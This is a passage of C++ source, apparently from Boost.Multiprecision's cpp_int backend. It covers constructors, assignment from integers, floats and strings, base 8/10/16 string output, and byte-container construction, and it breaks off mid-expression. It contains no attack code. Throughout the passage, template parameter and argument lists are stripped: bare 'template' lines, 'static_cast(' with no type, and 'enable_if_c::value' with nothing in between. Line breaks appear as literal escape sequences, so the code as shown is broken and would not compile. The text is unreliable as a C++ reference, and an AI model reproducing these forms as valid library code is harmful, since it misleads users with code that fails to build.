{}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? 1 + ~static_cast(-i & limb_mask) : static_cast(i & limb_mask)) { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(i & limb_mask)) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(static_cast(i & limb_mask)) { check_in_range(i); }\r\n#else\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(i < 0 ? (1 + ~static_cast(-i)) & limb_mask : static_cast(i) & limb_mask) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? 
1 + ~static_cast(-i) : static_cast(i)) { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(i) & limb_mask) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(static_cast(i)) { check_in_range(i); }\r\n#endif\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(F i, typename boost::enable_if >::type const* = 0) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n : m_data(static_cast(std::fabs(i)) & limb_mask)\r\n {\r\n check_in_range(i);\r\n if(i < 0)\r\n negate();\r\n }\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<>) BOOST_NOEXCEPT\r\n : m_data(static_cast(0u)) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack) BOOST_NOEXCEPT\r\n : m_data(static_cast(a)) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack) BOOST_NOEXCEPT\r\n : m_data(static_cast(a) | (static_cast(b) << bits_per_limb)) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR unsigned size()const BOOST_NOEXCEPT { return 1; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool sign()const BOOST_NOEXCEPT { return false; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n if(b)\r\n negate();\r\n }\r\n BOOST_MP_FORCEINLINE void resize(unsigned, unsigned min_size)\r\n {\r\n detail::verify_new_size(2, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n detail::verify_limb_mask(true, m_data, limb_mask, checked_type());\r\n m_data &= limb_mask;\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT : m_data(0) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o) BOOST_NOEXCEPT\r\n : m_data(o.m_data) {}\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n BOOST_MP_FORCEINLINE void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n m_data = o.m_data;\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n if(Checked == checked)\r\n {\r\n BOOST_THROW_EXCEPTION(std::range_error(\"Attempt to negate an unsigned type.\"));\r\n }\r\n m_data = ~m_data;\r\n ++m_data;\r\n }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return false;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n std::swap(m_data, o.m_data);\r\n }\r\n};\r\n//\r\n// Traits class, lets us know whether type T can be directly converted to the base type,\r\n// used to enable/disable constructors etc:\r\n//\r\ntemplate \r\nstruct is_allowed_cpp_int_base_conversion : public mpl::if_c<\r\n is_same::value || is_same::value\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n || is_same::value || is_same::value\r\n#endif\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n || literals::detail::is_value_pack::value\r\n#endif\r\n || 
(is_trivial_cpp_int::value && is_arithmetic::value),\r\n mpl::true_,\r\n mpl::false_\r\n >::type\r\n{};\r\n//\r\n// Now the actual backend, normalising parameters passed to the base class:\r\n//\r\ntemplate \r\nstruct cpp_int_backend\r\n : public cpp_int_base<\r\n min_precision >::value,\r\n max_precision >::value,\r\n SignType,\r\n Checked,\r\n Allocator,\r\n is_trivial_cpp_int >::value>\r\n{\r\n typedef cpp_int_backend self_type;\r\n typedef cpp_int_base<\r\n min_precision::value,\r\n max_precision::value,\r\n SignType,\r\n Checked,\r\n Allocator,\r\n is_trivial_cpp_int::value> base_type;\r\n typedef mpl::bool_::value> trivial_tag;\r\npublic:\r\n typedef typename mpl::if_<\r\n trivial_tag,\r\n mpl::list<\r\n signed char, short, int, long,\r\n boost::long_long_type, signed_double_limb_type>,\r\n mpl::list\r\n >::type signed_types;\r\n typedef typename mpl::if_<\r\n trivial_tag,\r\n mpl::list,\r\n mpl::list\r\n >::type unsigned_types;\r\n typedef typename mpl::if_<\r\n trivial_tag,\r\n mpl::list,\r\n mpl::list\r\n >::type float_types;\r\n typedef mpl::int_ checked_type;\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend() BOOST_NOEXCEPT{}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend(const cpp_int_backend& o) BOOST_MP_NOEXCEPT_IF(boost::is_void::value) : base_type(o) {}\r\n#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend(cpp_int_backend&& o) BOOST_NOEXCEPT\r\n : base_type(static_cast(o)) {}\r\n#endif\r\n //\r\n // Direct construction from arithmetic type:\r\n //\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend(Arg i, typename boost::enable_if_c::value >::type const* = 0)BOOST_MP_NOEXCEPT_IF(noexcept(base_type(std::declval())))\r\n : base_type(i) {}\r\n\r\nprivate:\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::true_ const&, mpl::true_ const &)\r\n {\r\n // Assigning trivial type to trivial type:\r\n this->check_in_range(*other.limbs());\r\n *this->limbs() = static_cast(*other.limbs());\r\n this->sign(other.sign());\r\n this->normalize();\r\n }\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::true_ const&, mpl::false_ const &)\r\n {\r\n // non-trivial to trivial narrowing conversion:\r\n double_limb_type v = *other.limbs();\r\n if(other.size() > 1)\r\n {\r\n v |= static_cast(other.limbs()[1]) << bits_per_limb;\r\n if((Checked == checked) && (other.size() > 2))\r\n {\r\n BOOST_THROW_EXCEPTION(std::range_error(\"Assignment of a cpp_int that is out of range for the target type.\"));\r\n }\r\n }\r\n *this = v;\r\n this->sign(other.sign());\r\n this->normalize();\r\n }\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::false_ const&, mpl::true_ const &)\r\n {\r\n // trivial to non-trivial, treat the trivial argument as if it were an unsigned arithmetic type, then set the sign afterwards:\r\n *this = static_cast<\r\n typename boost::multiprecision::detail::canonical<\r\n typename cpp_int_backend::local_limb_type,\r\n cpp_int_backend\r\n >::type\r\n >(*other.limbs());\r\n this->sign(other.sign());\r\n }\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::false_ const&, mpl::false_ const &)\r\n {\r\n // regular non-trivial to non-trivial assign:\r\n this->resize(other.size(), other.size());\r\n std::memcpy(this->limbs(), other.limbs(), (std::min)(other.size(), this->size()) * sizeof(this->limbs()[0]));\r\n this->sign(other.sign());\r\n this->normalize();\r\n }\r\npublic:\r\n template \r\n cpp_int_backend(\r\n const cpp_int_backend& 
other,\r\n typename boost::enable_if_c, self_type>::value>::type* = 0)\r\n : base_type()\r\n {\r\n do_assign(\r\n other,\r\n mpl::bool_::value>(),\r\n mpl::bool_ >::value>());\r\n }\r\n template \r\n explicit cpp_int_backend(\r\n const cpp_int_backend& other,\r\n typename boost::disable_if_c, self_type>::value>::type* = 0)\r\n : base_type()\r\n {\r\n do_assign(\r\n other,\r\n mpl::bool_::value>(),\r\n mpl::bool_ >::value>());\r\n }\r\n template \r\n cpp_int_backend& operator=(\r\n const cpp_int_backend& other)\r\n {\r\n do_assign(\r\n other,\r\n mpl::bool_::value>(),\r\n mpl::bool_ >::value>());\r\n return *this;\r\n }\r\n#ifdef BOOST_MP_USER_DEFINED_LITERALS\r\n BOOST_CONSTEXPR cpp_int_backend(const cpp_int_backend& a, const literals::detail::negate_tag& tag)\r\n : base_type(static_cast(a), tag){}\r\n#endif\r\n\r\n BOOST_MP_FORCEINLINE cpp_int_backend& operator = (const cpp_int_backend& o) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().assign(std::declval())))\r\n {\r\n this->assign(o);\r\n return *this;\r\n }\r\n#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES\r\n BOOST_MP_FORCEINLINE cpp_int_backend& operator = (cpp_int_backend&& o) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval() = std::declval()))\r\n {\r\n *static_cast(this) = static_cast(o);\r\n return *this;\r\n }\r\n#endif\r\nprivate:\r\n template \r\n typename boost::enable_if >::type do_assign_arithmetic(A val, const mpl::true_&) \r\n BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n {\r\n this->check_in_range(val);\r\n *this->limbs() = static_cast(val);\r\n this->normalize();\r\n }\r\n template \r\n typename boost::disable_if_c::value || !is_integral::value >::type do_assign_arithmetic(A val, const mpl::true_&) \r\n BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())) && noexcept(std::declval().sign(true)))\r\n {\r\n this->check_in_range(val);\r\n *this->limbs() = (val < 0) ? static_cast(boost::multiprecision::detail::unsigned_abs(val)) : static_cast(val);\r\n this->sign(val < 0);\r\n this->normalize();\r\n }\r\n template \r\n typename boost::enable_if_c< !is_integral::value>::type do_assign_arithmetic(A val, const mpl::true_&)\r\n {\r\n this->check_in_range(val);\r\n *this->limbs() = (val < 0) ? static_cast(boost::multiprecision::detail::abs(val)) : static_cast(val);\r\n this->sign(val < 0);\r\n this->normalize();\r\n }\r\n BOOST_MP_FORCEINLINE void do_assign_arithmetic(limb_type i, const mpl::false_&) BOOST_NOEXCEPT\r\n {\r\n this->resize(1, 1);\r\n *this->limbs() = i;\r\n this->sign(false);\r\n }\r\n BOOST_MP_FORCEINLINE void do_assign_arithmetic(signed_limb_type i, const mpl::false_&) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().sign(true)))\r\n {\r\n this->resize(1, 1);\r\n *this->limbs() = static_cast(boost::multiprecision::detail::unsigned_abs(i));\r\n this->sign(i < 0);\r\n }\r\n void do_assign_arithmetic(double_limb_type i, const mpl::false_&) BOOST_NOEXCEPT\r\n {\r\n BOOST_STATIC_ASSERT(sizeof(i) == 2 * sizeof(limb_type));\r\n BOOST_STATIC_ASSERT(base_type::internal_limb_count >= 2);\r\n typename base_type::limb_pointer p = this->limbs();\r\n#ifdef __MSVC_RUNTIME_CHECKS\r\n *p = static_cast(i & ~static_cast(0));\r\n#else\r\n *p = static_cast(i);\r\n#endif\r\n p[1] = static_cast(i >> base_type::limb_bits);\r\n this->resize(p[1] ? 2 : 1, p[1] ? 
2 : 1);\r\n this->sign(false);\r\n }\r\n void do_assign_arithmetic(signed_double_limb_type i, const mpl::false_&) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().sign(true)))\r\n {\r\n BOOST_STATIC_ASSERT(sizeof(i) == 2 * sizeof(limb_type));\r\n BOOST_STATIC_ASSERT(base_type::internal_limb_count >= 2);\r\n bool s = false;\r\n double_limb_type ui;\r\n if(i < 0)\r\n s = true;\r\n ui = static_cast(boost::multiprecision::detail::unsigned_abs(i));\r\n typename base_type::limb_pointer p = this->limbs();\r\n#ifdef __MSVC_RUNTIME_CHECKS\r\n *p = static_cast(ui & ~static_cast(0));\r\n#else\r\n *p = static_cast(ui);\r\n#endif\r\n p[1] = static_cast(ui >> base_type::limb_bits);\r\n this->resize(p[1] ? 2 : 1, p[1] ? 2 : 1);\r\n this->sign(s);\r\n }\r\n\r\n void do_assign_arithmetic(long double a, const mpl::false_&)\r\n {\r\n using default_ops::eval_add;\r\n using default_ops::eval_subtract;\r\n using std::frexp;\r\n using std::ldexp;\r\n using std::floor;\r\n\r\n if(a < 0)\r\n {\r\n do_assign_arithmetic(-a, mpl::false_());\r\n this->sign(true);\r\n return;\r\n }\r\n\r\n if (a == 0) {\r\n *this = static_cast(0u);\r\n }\r\n\r\n if (a == 1) {\r\n *this = static_cast(1u);\r\n }\r\n\r\n BOOST_ASSERT(!(boost::math::isinf)(a));\r\n BOOST_ASSERT(!(boost::math::isnan)(a));\r\n\r\n int e;\r\n long double f, term;\r\n *this = static_cast(0u);\r\n\r\n f = frexp(a, &e);\r\n\r\n static const limb_type shift = std::numeric_limits::digits;\r\n\r\n while(f)\r\n {\r\n // extract int sized bits from f:\r\n f = ldexp(f, shift);\r\n term = floor(f);\r\n e -= shift;\r\n eval_left_shift(*this, shift);\r\n if(term > 0)\r\n eval_add(*this, static_cast(term));\r\n else\r\n eval_subtract(*this, static_cast(-term));\r\n f -= term;\r\n }\r\n if(e > 0)\r\n eval_left_shift(*this, e);\r\n else if(e < 0)\r\n eval_right_shift(*this, -e);\r\n }\r\npublic:\r\n template \r\n BOOST_MP_FORCEINLINE typename boost::enable_if_c::value, cpp_int_backend&>::type operator = (Arithmetic val) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().do_assign_arithmetic(std::declval(), trivial_tag())))\r\n {\r\n do_assign_arithmetic(val, trivial_tag());\r\n return *this;\r\n }\r\nprivate:\r\n void do_assign_string(const char* s, const mpl::true_&)\r\n {\r\n std::size_t n = s ? std::strlen(s) : 0;\r\n *this = 0;\r\n unsigned radix = 10;\r\n bool isneg = false;\r\n if(n && (*s == '-'))\r\n {\r\n --n;\r\n ++s;\r\n isneg = true;\r\n }\r\n if(n && (*s == '0'))\r\n {\r\n if((n > 1) && ((s[1] == 'x') || (s[1] == 'X')))\r\n {\r\n radix = 16;\r\n s +=2;\r\n n -= 2;\r\n }\r\n else\r\n {\r\n radix = 8;\r\n n -= 1;\r\n }\r\n }\r\n if(n)\r\n {\r\n unsigned val;\r\n while(*s)\r\n {\r\n if(*s >= '0' && *s <= '9')\r\n val = *s - '0';\r\n else if(*s >= 'a' && *s <= 'f')\r\n val = 10 + *s - 'a';\r\n else if(*s >= 'A' && *s <= 'F')\r\n val = 10 + *s - 'A';\r\n else\r\n val = radix + 1;\r\n if(val >= radix)\r\n {\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected content found while parsing character string.\"));\r\n }\r\n *this->limbs() = detail::checked_multiply(*this->limbs(), static_cast(radix), checked_type());\r\n *this->limbs() = detail::checked_add(*this->limbs(), static_cast(val), checked_type());\r\n ++s;\r\n }\r\n }\r\n if(isneg)\r\n this->negate();\r\n }\r\n void do_assign_string(const char* s, const mpl::false_&)\r\n {\r\n using default_ops::eval_multiply;\r\n using default_ops::eval_add;\r\n std::size_t n = s ? 
std::strlen(s) : 0;\r\n *this = static_cast(0u);\r\n unsigned radix = 10;\r\n bool isneg = false;\r\n if(n && (*s == '-'))\r\n {\r\n --n;\r\n ++s;\r\n isneg = true;\r\n }\r\n if(n && (*s == '0'))\r\n {\r\n if((n > 1) && ((s[1] == 'x') || (s[1] == 'X')))\r\n {\r\n radix = 16;\r\n s +=2;\r\n n -= 2;\r\n }\r\n else\r\n {\r\n radix = 8;\r\n n -= 1;\r\n }\r\n }\r\n //\r\n // Exception guarantee: create the result in stack variable \"result\"\r\n // then do a swap at the end. In the event of a throw, *this will\r\n // be left unchanged.\r\n //\r\n cpp_int_backend result;\r\n if(n)\r\n {\r\n if(radix == 16)\r\n {\r\n while(*s == '0') ++s;\r\n std::size_t bitcount = 4 * std::strlen(s);\r\n limb_type val;\r\n std::size_t limb, shift;\r\n if(bitcount > 4)\r\n bitcount -= 4;\r\n else\r\n bitcount = 0;\r\n std::size_t newsize = bitcount / (sizeof(limb_type) * CHAR_BIT) + 1;\r\n result.resize(static_cast(newsize), static_cast(newsize)); // will throw if this is a checked integer that cannot be resized\r\n std::memset(result.limbs(), 0, result.size() * sizeof(limb_type));\r\n while(*s)\r\n {\r\n if(*s >= '0' && *s <= '9')\r\n val = *s - '0';\r\n else if(*s >= 'a' && *s <= 'f')\r\n val = 10 + *s - 'a';\r\n else if(*s >= 'A' && *s <= 'F')\r\n val = 10 + *s - 'A';\r\n else\r\n {\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected content found while parsing character string.\"));\r\n }\r\n limb = bitcount / (sizeof(limb_type) * CHAR_BIT);\r\n shift = bitcount % (sizeof(limb_type) * CHAR_BIT);\r\n val <<= shift;\r\n if(result.size() > limb)\r\n {\r\n result.limbs()[limb] |= val;\r\n }\r\n ++s;\r\n bitcount -= 4;\r\n }\r\n result.normalize();\r\n }\r\n else if(radix == 8)\r\n {\r\n while(*s == '0') ++s;\r\n std::size_t bitcount = 3 * std::strlen(s);\r\n limb_type val;\r\n std::size_t limb, shift;\r\n if(bitcount > 3)\r\n bitcount -= 3;\r\n else\r\n bitcount = 0;\r\n std::size_t newsize = bitcount / (sizeof(limb_type) * CHAR_BIT) + 1;\r\n result.resize(static_cast(newsize), static_cast(newsize)); // will throw if this is a checked integer that cannot be resized\r\n std::memset(result.limbs(), 0, result.size() * sizeof(limb_type));\r\n while(*s)\r\n {\r\n if(*s >= '0' && *s <= '7')\r\n val = *s - '0';\r\n else\r\n {\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected content found while parsing character string.\"));\r\n }\r\n limb = bitcount / (sizeof(limb_type) * CHAR_BIT);\r\n shift = bitcount % (sizeof(limb_type) * CHAR_BIT);\r\n if(result.size() > limb)\r\n {\r\n result.limbs()[limb] |= (val << shift);\r\n if(shift > sizeof(limb_type) * CHAR_BIT - 3)\r\n {\r\n // Deal with the bits in val that overflow into the next limb:\r\n val >>= (sizeof(limb_type) * CHAR_BIT - shift);\r\n if(val)\r\n {\r\n // If this is the most-significant-limb, we may need to allocate an extra one for the overflow:\r\n if(limb + 1 == newsize)\r\n result.resize(static_cast(newsize + 1), static_cast(newsize + 1));\r\n if(result.size() > limb + 1)\r\n {\r\n result.limbs()[limb + 1] |= val;\r\n }\r\n }\r\n }\r\n }\r\n ++s;\r\n bitcount -= 3;\r\n }\r\n result.normalize();\r\n }\r\n else\r\n {\r\n // Base 10, we extract blocks of size 10^9 at a time, that way\r\n // the number of multiplications is kept to a minimum:\r\n limb_type block_mult = max_block_10;\r\n while(*s)\r\n {\r\n limb_type block = 0;\r\n for(unsigned i = 0; i < digits_per_block_10; ++i)\r\n {\r\n limb_type val;\r\n if(*s >= '0' && *s <= '9')\r\n val = *s - '0';\r\n else\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected character encountered in 
input.\"));\r\n block *= 10;\r\n block += val;\r\n if(!*++s)\r\n {\r\n block_mult = block_multiplier(i);\r\n break;\r\n }\r\n }\r\n eval_multiply(result, block_mult);\r\n eval_add(result, block);\r\n }\r\n }\r\n }\r\n if(isneg)\r\n result.negate();\r\n result.swap(*this);\r\n }\r\npublic:\r\n cpp_int_backend& operator = (const char* s)\r\n {\r\n do_assign_string(s, trivial_tag());\r\n return *this;\r\n }\r\n BOOST_MP_FORCEINLINE void swap(cpp_int_backend& o) BOOST_NOEXCEPT\r\n {\r\n this->do_swap(o);\r\n }\r\nprivate:\r\n std::string do_get_trivial_string(std::ios_base::fmtflags f, const mpl::false_&)const\r\n {\r\n typedef typename mpl::if_c::type io_type;\r\n if(this->sign() && (((f & std::ios_base::hex) == std::ios_base::hex) || ((f & std::ios_base::oct) == std::ios_base::oct)))\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Base 8 or 16 printing of negative numbers is not supported.\"));\r\n std::stringstream ss;\r\n ss.flags(f & ~std::ios_base::showpos);\r\n ss << static_cast(*this->limbs());\r\n std::string result;\r\n if(this->sign())\r\n result += '-';\r\n else if(f & std::ios_base::showpos)\r\n result += '+';\r\n result += ss.str();\r\n return result;\r\n }\r\n std::string do_get_trivial_string(std::ios_base::fmtflags f, const mpl::true_&)const\r\n {\r\n // Even though we have only one limb, we can't do IO on it :-(\r\n int base = 10;\r\n if((f & std::ios_base::oct) == std::ios_base::oct)\r\n base = 8;\r\n else if((f & std::ios_base::hex) == std::ios_base::hex)\r\n base = 16;\r\n std::string result;\r\n\r\n unsigned Bits = sizeof(typename base_type::local_limb_type) * CHAR_BIT;\r\n\r\n if(base == 8 || base == 16)\r\n {\r\n if(this->sign())\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Base 8 or 16 printing of negative numbers is not supported.\"));\r\n limb_type shift = base == 8 ? 3 : 4;\r\n limb_type mask = static_cast((1u << shift) - 1);\r\n typename base_type::local_limb_type v = *this->limbs();\r\n result.assign(Bits / shift + (Bits % shift ? 1 : 0), '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n for(unsigned i = 0; i < Bits / shift; ++i)\r\n {\r\n char c = '0' + static_cast(v & mask);\r\n if(c > '9')\r\n c += 'A' - '9' - 1;\r\n result[pos--] = c;\r\n v >>= shift;\r\n }\r\n if(Bits % shift)\r\n {\r\n mask = static_cast((1u << (Bits % shift)) - 1);\r\n char c = '0' + static_cast(v & mask);\r\n if(c > '9')\r\n c += 'A' - '9';\r\n result[pos] = c;\r\n }\r\n //\r\n // Get rid of leading zeros:\r\n //\r\n std::string::size_type n = result.find_first_not_of('0');\r\n if(!result.empty() && (n == std::string::npos))\r\n n = result.size() - 1;\r\n result.erase(0, n);\r\n if(f & std::ios_base::showbase)\r\n {\r\n const char* pp = base == 8 ? 
\"0\" : \"0x\";\r\n result.insert(static_cast(0), pp);\r\n }\r\n }\r\n else\r\n {\r\n result.assign(Bits / 3 + 1, '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n typename base_type::local_limb_type v(*this->limbs());\r\n bool neg = false;\r\n if(this->sign())\r\n {\r\n neg = true;\r\n }\r\n while(v)\r\n {\r\n result[pos] = (v % 10) + '0';\r\n --pos;\r\n v /= 10;\r\n }\r\n std::string::size_type n = result.find_first_not_of('0');\r\n result.erase(0, n);\r\n if(result.empty())\r\n result = \"0\";\r\n if(neg)\r\n result.insert(static_cast(0), 1, '-');\r\n else if(f & std::ios_base::showpos)\r\n result.insert(static_cast(0), 1, '+');\r\n }\r\n return result;\r\n }\r\n std::string do_get_string(std::ios_base::fmtflags f, const mpl::true_&)const\r\n {\r\n#ifdef BOOST_MP_NO_DOUBLE_LIMB_TYPE_IO\r\n return do_get_trivial_string(f, mpl::bool_::value>());\r\n#else\r\n return do_get_trivial_string(f, mpl::bool_());\r\n#endif\r\n }\r\n std::string do_get_string(std::ios_base::fmtflags f, const mpl::false_&)const\r\n {\r\n using default_ops::eval_get_sign;\r\n int base = 10;\r\n if((f & std::ios_base::oct) == std::ios_base::oct)\r\n base = 8;\r\n else if((f & std::ios_base::hex) == std::ios_base::hex)\r\n base = 16;\r\n std::string result;\r\n\r\n unsigned Bits = this->size() * base_type::limb_bits;\r\n\r\n if(base == 8 || base == 16)\r\n {\r\n if(this->sign())\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Base 8 or 16 printing of negative numbers is not supported.\"));\r\n limb_type shift = base == 8 ? 3 : 4;\r\n limb_type mask = static_cast((1u << shift) - 1);\r\n cpp_int_backend t(*this);\r\n result.assign(Bits / shift + ((Bits % shift) ? 1 : 0), '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n for(unsigned i = 0; i < Bits / shift; ++i)\r\n {\r\n char c = '0' + static_cast(t.limbs()[0] & mask);\r\n if(c > '9')\r\n c += 'A' - '9' - 1;\r\n result[pos--] = c;\r\n eval_right_shift(t, shift);\r\n }\r\n if(Bits % shift)\r\n {\r\n mask = static_cast((1u << (Bits % shift)) - 1);\r\n char c = '0' + static_cast(t.limbs()[0] & mask);\r\n if(c > '9')\r\n c += 'A' - '9';\r\n result[pos] = c;\r\n }\r\n //\r\n // Get rid of leading zeros:\r\n //\r\n std::string::size_type n = result.find_first_not_of('0');\r\n if(!result.empty() && (n == std::string::npos))\r\n n = result.size() - 1;\r\n result.erase(0, n);\r\n if(f & std::ios_base::showbase)\r\n {\r\n const char* pp = base == 8 ? 
\"0\" : \"0x\";\r\n result.insert(static_cast(0), pp);\r\n }\r\n }\r\n else\r\n {\r\n result.assign(Bits / 3 + 1, '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n cpp_int_backend t(*this);\r\n cpp_int_backend r;\r\n bool neg = false;\r\n if(t.sign())\r\n {\r\n t.negate();\r\n neg = true;\r\n }\r\n if(this->size() == 1)\r\n {\r\n result = boost::lexical_cast(t.limbs()[0]);\r\n }\r\n else\r\n {\r\n cpp_int_backend block10;\r\n block10 = max_block_10;\r\n while(eval_get_sign(t) != 0)\r\n {\r\n cpp_int_backend t2;\r\n divide_unsigned_helper(&t2, t, block10, r);\r\n t = t2;\r\n limb_type v = r.limbs()[0];\r\n for(unsigned i = 0; i < digits_per_block_10; ++i)\r\n {\r\n char c = '0' + v % 10;\r\n v /= 10;\r\n result[pos] = c;\r\n if(pos-- == 0)\r\n break;\r\n }\r\n }\r\n }\r\n std::string::size_type n = result.find_first_not_of('0');\r\n result.erase(0, n);\r\n if(result.empty())\r\n result = \"0\";\r\n if(neg)\r\n result.insert(static_cast(0), 1, '-');\r\n else if(f & std::ios_base::showpos)\r\n result.insert(static_cast(0), 1, '+');\r\n }\r\n return result;\r\n }\r\npublic:\r\n std::string str(std::streamsize /*digits*/, std::ios_base::fmtflags f)const\r\n {\r\n return do_get_string(f, trivial_tag());\r\n }\r\nprivate:\r\n template \r\n void construct_from_container(const Container& c, const mpl::false_&)\r\n {\r\n //\r\n // We assume that c is a sequence of (unsigned) bytes with the most significant byte first:\r\n //\r\n unsigned newsize = static_cast(c.size() / sizeof(limb_type));\r\n if(c.size() % sizeof(limb_type))\r\n {\r\n ++newsize;\r\n }\r\n if(newsize)\r\n {\r\n this->resize(newsize, newsize); // May throw\r\n std::memset(this->limbs(), 0, this->size());\r\n typename Container::const_iterator i(c.begin()), j(c.end());\r\n unsigned byte_location = static_cast(c.size() - 1);\r\n while(i != j)\r\n {\r\n unsigned limb = byte_location / sizeof(limb_type);\r\n unsigned shift = (byte_location % sizeof(limb_type)) * CHAR_BIT;\r\n if(this->size() > limb)\r\n this->limbs()[limb] |= static_cast(static_cast(*i)) << shift;\r\n ++i;\r\n --byte_location;\r\n }\r\n }\r\n }\r\n template \r\n void construct_from_container(const Container& c, const mpl::true_&)\r\n {\r\n //\r\n // We assume that c is a sequence of (unsigned) bytes with the most significant byte first:\r\n //\r\n typedef typename base_type::local_limb_type local_limb_type;\r\n *this->limbs() = 0;\r\n if(c.size())\r\n {\r\n typename Container::const_iterator i(c.begin()), j(c.end());\r\n unsigned byte_location = static_cast(c.size() - 1);\r\n while(i != j)\r\n {\r\n unsigned limb = byte_location / sizeof(local_limb_type);\r\n unsigned shift = (byte_location % sizeof(local_limb_type)) * CHAR_BIT;\r\n if(limb == 0)\r\n this->limbs()[0] |= static_cast(static_cast(*i)) << shift;\r\n ++i;\r\n --byte_location;\r\n }\r\n }\r\n }\r\npublic:\r\n template \r\n cpp_int_backend(const Container& c, typename boost::enable_if_c::value>::type const* = 0)\r\n {\r\n //\r\n // We assume that c is a sequence of (unsigned) bytes with the most significant byte first:\r\n //\r\n construct_from_container(c, trivial_tag());\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::false_&, const mpl::false_&)const BOOST_NOEXCEPT\r\n {\r\n if(this->sign() != o.sign())\r\n return this->sign() ? 
